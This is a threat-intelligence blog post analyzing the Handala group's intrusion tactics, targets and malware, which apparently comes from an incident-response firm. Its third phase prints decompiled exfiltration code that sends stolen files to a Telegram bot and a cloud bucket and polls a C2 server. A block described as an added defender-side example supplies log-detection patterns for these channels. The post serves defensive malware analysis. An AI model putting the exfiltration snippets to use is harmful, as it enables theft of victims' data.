
Unpacking Handala – Evolution of a Cyberthreat

Matan Matalon

February 18, 2025

For over a year, Handala has been relentlessly targeting the Israeli sector, evolving from a disruptive nuisance to a formidable cyber threat. What started as unsophisticated phishing campaigns and DDoS attacks has now escalated into a full-fledged offensive against critical infrastructure. But what exactly changed?

In this first-of-its-kind research, we reveal how Handala has transformed from a hacktivist group into an aspiring nation-state-level adversary, leveraging advanced tactics, stolen credentials, and covert data exfiltration techniques. With the help of our in-house AI-powered analysis tools, we dissect their malware, uncover hidden operational patterns, and reverse-engineer their attack framework.

For the first time, we reveal their evolving tactics, the technologies fueling their operations, and their methods for siphoning sensitive data to cloud storage and Telegram.

This isn’t just another cyber threat; it’s a turning point.

And trust us, there’s a lot to unpack…

Why OP Innovate Conducted This Research

At OP Innovate, we pride ourselves on delivering top-tier incident response (IR) services, and over the past several months, we’ve been on the front lines of multiple Handala-related investigations. Time and time again, we’ve seen the same pattern: organizations blindsided by an attacker that was evolving faster than most defenders could react.

Through these real-world incidents, we uncovered a wealth of Indicators of Compromise (IOCs), intel that wasn’t publicly available anywhere else. And that’s when the idea struck: What if we took the time to dig deeper? By reverse-engineering the traces Handala left behind and following the breadcrumbs, we could piece together their evolving playbook. More importantly, we can use these insights to arm future victims with the knowledge to detect, disrupt, and defend against these attacks before their data is compromised.

This research isn’t just about understanding Handala; it’s about staying one step ahead.

Handala 2.0: From Keyboard Warriors to Cyber Militants

Over the past six months, Handala has evolved from a disruptive hacktivist collective into a structured cyber threat actor, adopting nation-state-level tactics and expanding its target selection from random disruptions to calculated attacks on critical infrastructure. This transition reflects a shift from cyber vandalism to organized cyber warfare, with a growing focus on stealth, persistence, and large-scale data exfiltration.

Tactics: From Defacements to Strategic Infiltration

  • Credential-Based Attacks:
    Handala has moved away from simplistic DDoS attacks and defacements, instead exploiting stolen credentials from dark web marketplaces. By targeting organizations that do not enforce multi-factor authentication (MFA), they gain stealthy, long-term access without triggering security alerts.
  • Privilege Escalation & Backdoors:
    Once inside a network, Handala rapidly escalates privileges, often creating backdoor accounts to maintain access even if the initial entry point is patched. This persistence allows them to return to compromised networks at will.
  • Cloud-Based Exfiltration:
    Rather than relying on direct data transfers, Handala stores exfiltrated data in legitimate cloud services like Storj and Vultr, making their operations harder to detect and disrupt.
  • Multi-Channel C2 & Evasion Techniques:
    Handala’s malware blends into normal network traffic by communicating over Telegram’s encrypted API, HTTP-based C2 servers, and cloud APIs, making detection challenging.

Target Selection: From Random Disruptions to High-Value Supply Chain Attacks

  • Early Targets:
    • Small businesses and media outlets.
    • Public-facing websites, often attacked for maximum visibility rather than operational impact.
  • Recent Targets:
    • Supply Chain Vendors – Instead of attacking individual organizations directly, Handala breaches IT and cloud service providers to gain access to multiple downstream victims.
    • Critical Infrastructure – The group has increasingly targeted companies providing essential services, with a focus on IT management, cloud services, and engineering firms.

Some of their most recent confirmed breaches include:

  • ReutOne (CRM Provider) – This breach also allowed indirect access to Allen Carr’s Easyway, a well-known addiction treatment institution.
  • Zuk Group (Construction & Engineering Firm) – A multinational financial and technology conglomerate.

These attacks indicate a deliberate shift towards infiltrating service providers, a hallmark of sophisticated, long-term cyber campaigns aimed at gaining access to entire industries rather than single entities.

Unpacking Handala: Tracing the Trail of Stolen Data

Using forensic evidence from multiple breach sites, we conducted a deep dive into Handala’s malware infrastructure, exfiltration techniques, and operational persistence mechanisms. Our findings confirm that Handala is not just breaching networks but systematically organizing and distributing stolen intelligence to secure locations.

Phase 1: Extracting and Analyzing the Malware

1. Cracking Open senvarservice-DC.exe

One of the first major discoveries in our investigation was a Windows executable (senvarservice-DC.exe), which turned out to be a PyInstaller-packed Python script masquerading as a legitimate application.

By unpacking the executable, we found:

  • Amazon botocore references, suggesting AWS S3 was being used for data exfiltration.
  • PyQt5 dependencies, indicating a GUI component that could be used for disguise.

2. Automating Reverse Engineering with LISA

Using LISA (Layered Inspection & Structural Analysis), our AI-powered reverse engineering tool, we were able to:

  • Disassemble the binary and extract its structure.
  • Decompile the Python code hidden within.
  • Detect Indicators of Compromise (IOCs).

With LISA, we accelerated the unpacking process, allowing us to focus on analyzing Handala’s malware behavior rather than just its packaging.

Phase 2: Breaking Down the Code

Once the internal Python scripts were extracted, we needed to decompile them. However, the malware was written in Python 3.12, making traditional decompilers like uncompyle6 and pycdc ineffective.

Automating the Decompilation Process

To handle this, we built a custom automation script that:

  • Uploaded .pyc files to Pylingual.io for decompilation.
  • Fetched results and saved readable Python scripts.
  • Allowed bulk processing, significantly reducing manual workload.

Once the code was fully decompiled, we moved to Phase 3: Understanding Handala’s Cyber Toolkit.

Phase 3: Understanding Handala’s Cyber Toolkit

1. Telegram API for Data Exfiltration

The malware automates data exfiltration via Telegram bots; because the uploads go to api.telegram.org over HTTPS like legitimate Telegram traffic, they are harder to detect.

import requests

def send_document(bot_token, chat_id, file_path):
    # The bot token travels in the URL path, so every upload exposes it to proxy logs
    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
    files = {"document": open(file_path, 'rb')}
    payload = {"chat_id": chat_id}
    response = requests.post(url, files=files, data=payload)
    return response.status_code

2. HTTP-Based C2 Communication

The malware periodically checks its hardcoded HTTP C2 server for commands.

def fetch_c2_command():
    # server_url (the hardcoded C2 address) and log_error are defined elsewhere in
    # the decompiled script and rely on the same requests import; the address is not reproduced here
    try:
        response = requests.get(f"{server_url}/command")
        if response.status_code == 200:
            return response.json()
    except Exception as e:
        log_error(f"Error fetching commands: {str(e)}")
    return None

3. Cloud-Based Storage for Stolen Data

The malware uploads stolen files to Storj cloud storage for long-term retention.

import os
import boto3

def upload_to_s3(file_path):
    # S3_access_key / S3_secret_key are hardcoded in the sample (values omitted here)
    # No endpoint_url appears in this excerpt; Storj's S3-compatible gateway is normally selected with one
    session = boto3.Session(aws_access_key_id=S3_access_key, aws_secret_access_key=S3_secret_key)
    s3 = session.resource('s3')
    bucket = s3.Bucket('handala-bucket')
    bucket.upload_file(file_path, os.path.basename(file_path))
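As an added defender-side example (not code from the original post or from the malware), the script below triages constructed egress-proxy log lines for the three channels described in this phase: Telegram bot document uploads, fixed-interval polling of a /command path, and bulk PUTs to an S3-compatible gateway. The log format, the gateway hostnames and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample egress log (one request per line):
# "<timestamp> <source ip> <method> <url> <status> <bytes sent>"
SAMPLE_LOG = """\
2025-02-10T09:00:05 10.1.4.22 POST https://api.telegram.org/bot123456:AAEXAMPLETOKEN/sendDocument 200 1048576
2025-02-10T09:00:35 10.1.4.22 GET http://203.0.113.9/command 200 120
2025-02-10T09:01:05 10.1.4.22 GET http://203.0.113.9/command 200 118
2025-02-10T09:01:35 10.1.4.22 GET http://203.0.113.9/command 200 121
2025-02-10T09:02:05 10.1.4.22 GET http://203.0.113.9/command 200 119
2025-02-10T09:03:10 10.1.4.22 PUT https://gateway.storjshare.io/handala-bucket/finance.zip 200 52428800
2025-02-10T09:04:00 10.1.4.50 GET https://www.example.com/index.html 200 3000
"""

# Telegram bot API calls carry the bot token ("<numeric id>:<secret>") in the path;
# sendDocument is the upload method used by the decompiled snippet above.
TELEGRAM_UPLOAD = re.compile(r"^https://api\.telegram\.org/bot\d+:[\w-]+/sendDocument")
# S3-compatible object stores (the Storj gateway hostname and AWS S3 pattern are assumptions)
S3_STYLE_HOST = re.compile(r"^https://(gateway\.storjshare\.io|[\w.-]*s3[\w.-]*\.amazonaws\.com)/")

def parse_line(line):
    ts, src, method, url, status, sent = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "method": method,
            "url": url, "status": int(status), "bytes_out": int(sent)}

def triage(log_text, min_polls=3, max_jitter_s=5, bulk_bytes=10 * 1024 * 1024):
    """Return (source ip, finding, url) tuples for the three exfil/C2 patterns."""
    findings = []
    gets = defaultdict(list)           # (src, url) -> timestamps of GET requests
    for line in log_text.splitlines():
        e = parse_line(line)
        if e["method"] == "POST" and TELEGRAM_UPLOAD.match(e["url"]):
            findings.append((e["src"], "telegram_bot_upload", e["url"]))
        elif e["method"] == "PUT" and S3_STYLE_HOST.match(e["url"]) and e["bytes_out"] >= bulk_bytes:
            findings.append((e["src"], "bulk_cloud_upload", e["url"]))
        elif e["method"] == "GET":
            gets[(e["src"], e["url"])].append(e["ts"])
    # Beaconing check: repeated GETs to one URL at a near-constant interval are what a
    # hardcoded "poll /command every N seconds" loop looks like from the network side.
    for (src, url), times in gets.items():
        if len(times) < min_polls:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= max_jitter_s:
            findings.append((src, "periodic_c2_poll", url))
    return findings
```

Feeding real proxy exports through the same three checks flags the host to isolate and the bot token or bucket name to hand to the platform provider for takedown.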

Final Observations: The Future of Handala’s Cyber Operations

  • Stealth & Persistence: Handala’s use of multi-channel exfiltration and modular malware design allows for long-term infiltration.
  • Adaptive Strategy: Attackers can switch C2 infrastructure, encryption methods, and targets in real-time.
  • Supply Chain Targeting: By compromising IT vendors, Handala can expand its reach beyond a single victim.

Understanding these tactics is critical for cybersecurity teams, as Handala continues to refine its strategy against high-value organizations.
